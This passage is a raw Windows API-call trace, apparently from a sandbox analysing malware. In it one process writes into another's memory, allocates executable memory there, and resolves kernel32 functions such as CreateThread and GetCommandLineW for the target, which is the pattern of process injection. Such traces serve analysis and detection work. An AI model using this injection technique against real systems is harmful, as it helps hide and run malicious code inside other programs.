	[0187.714] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb770c*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb770c*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.715] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.715] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.715] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.715] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.715] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.716] ResetEvent (hEvent=0x478) returned 1
	[0187.716] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.716] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.716] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.716] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.716] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.716] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005511c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.717] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.717] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.717] lstrlenA (lpString="GetConsoleMode") returned 14
	[0187.717] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.717] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb76fa*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb76fa*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.717] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.717] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.717] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.718] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.718] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.718] ResetEvent (hEvent=0x478) returned 1
	[0187.718] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.718] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.718] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.719] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.719] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.719] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055120, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.719] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.719] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.719] lstrlenA (lpString="GetConsoleCP") returned 12
	[0187.719] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.719] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb76ea*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb76ea*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.720] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.720] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.720] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.720] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.720] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.720] ResetEvent (hEvent=0x478) returned 1
	[0187.720] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.721] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.721] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.721] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.721] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.721] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055124, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.721] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.721] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.721] lstrlenA (lpString="FlushFileBuffers") returned 16
	[0187.722] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.722] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb76d6*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb76d6*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.722] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.722] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.722] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.722] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.722] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.723] ResetEvent (hEvent=0x478) returned 1
	[0187.723] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.723] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.723] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.723] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.723] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.723] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055128, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.724] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.724] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.724] lstrlenA (lpString="SetStdHandle") returned 12
	[0187.724] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.724] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb76c6*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb76c6*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.724] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.724] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.724] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.724] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.725] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.725] ResetEvent (hEvent=0x478) returned 1
	[0187.725] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.725] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.725] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.726] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.726] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005512c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.726] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.726] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.726] lstrlenA (lpString="FreeEnvironmentStringsW") returned 23
	[0187.726] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.726] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb76ac*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb76ac*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0187.727] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.727] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.727] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.727] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.728] ResetEvent (hEvent=0x478) returned 1
	[0187.728] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.728] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.728] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.728] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.728] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055130, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.728] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.729] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.729] lstrlenA (lpString="GetEnvironmentStringsW") returned 22
	[0187.729] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.729] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7692*, nSize=0x17, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7692*, lpNumberOfBytesWritten=0x12857c*=0x17) returned 1
	[0187.729] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.729] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.729] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.729] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.730] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.730] ResetEvent (hEvent=0x478) returned 1
	[0187.730] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.730] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.730] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.730] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.730] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.730] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055134, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.731] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.731] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.731] lstrlenA (lpString="GetCommandLineW") returned 15
	[0187.731] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.731] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7680*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7680*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0187.731] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.732] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.732] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.732] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.732] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.732] ResetEvent (hEvent=0x478) returned 1
	[0187.732] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.732] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.733] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.733] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.733] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.733] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055138, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.733] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.733] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.733] lstrlenA (lpString="GetCommandLineA") returned 15
	[0187.733] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.733] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb766e*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb766e*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0187.734] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.734] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.734] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.734] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.734] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.735] ResetEvent (hEvent=0x478) returned 1
	[0187.735] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.735] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.735] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.735] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.735] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.735] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005513c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.735] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.736] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.736] lstrlenA (lpString="CreateThread") returned 12
	[0187.736] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.736] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6bea*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6bea*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.736] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.736] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.736] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.736] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.737] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.737] ResetEvent (hEvent=0x478) returned 1
	[0187.737] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.737] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.737] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.737] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.737] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.738] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055140, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.738] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.738] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.738] lstrlenA (lpString="CloseHandle") returned 11
	[0187.738] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.738] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6bdc*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6bdc*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.739] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.739] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.739] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.739] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.739] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.739] ResetEvent (hEvent=0x478) returned 1
